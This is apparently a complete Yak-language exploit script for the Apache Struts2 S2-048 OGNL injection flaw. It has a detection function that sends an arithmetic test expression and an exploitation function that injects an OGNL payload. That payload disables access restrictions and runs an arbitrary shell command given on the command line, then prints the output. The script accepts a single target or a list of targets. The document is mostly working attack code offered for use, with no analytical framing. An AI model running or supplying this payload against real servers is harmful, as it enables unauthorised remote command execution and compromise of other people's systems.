
//定义检测函数
func poc(url){

    num1 = randn(10000,100000)
    num2 = randn(10000,100000)


    check_poc = sprintf("%s%d%s%d%s","%24%7B",num1,"%2B",num2,"%7D")
    req, err = http.Post(
        url,
        http.useragent(http.uarand()),
        http.header("Content-Type","application/x-www-form-urlencoded"),
        http.body(sprintf("username=test&password=%s",check_poc)),
    )
    if err != nil {
        return
    }
    if re.Match(parseStr(num1+num2),http.GetAllBody(req)){
        log.warn( url + " S2_048 found !!!")
    }else{
        log.debug(url + " S2_048 safe !!!")
    }
    
}


//定义利用函数
func exp(url,cmd){
    exec_payload = `%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('`+cmd+`').getInputStream())).(%23q)%7D`
                    
    req, err = http.Post(
        url,
        http.useragent(http.uarand()),
        http.header("Content-Type","application/x-www-form-urlencoded"),
        http.body(sprintf("username=test&password=%s",exec_payload)),
        )
    println(string(http.GetAllBody(req)))
   // http.show(req)
}


if YAK_MAIN {
    loglevel("info")
    u = cli.String("u")
    file = cli.LineDict("f")
    cmd = cli.String("cmd")

    if u == "" && len(file)<1 {
        log.info("you need input target -u or -f")
        return
    }

    if u != ""{
        if cmd != ""{
            exp(u,cmd)
        }else{
            poc(u)
        }
        return
    }

    for _,u = range file {
         if cmd != "" {
            exp(u,cmd)
        }else{
            poc(u)
        }
    }

}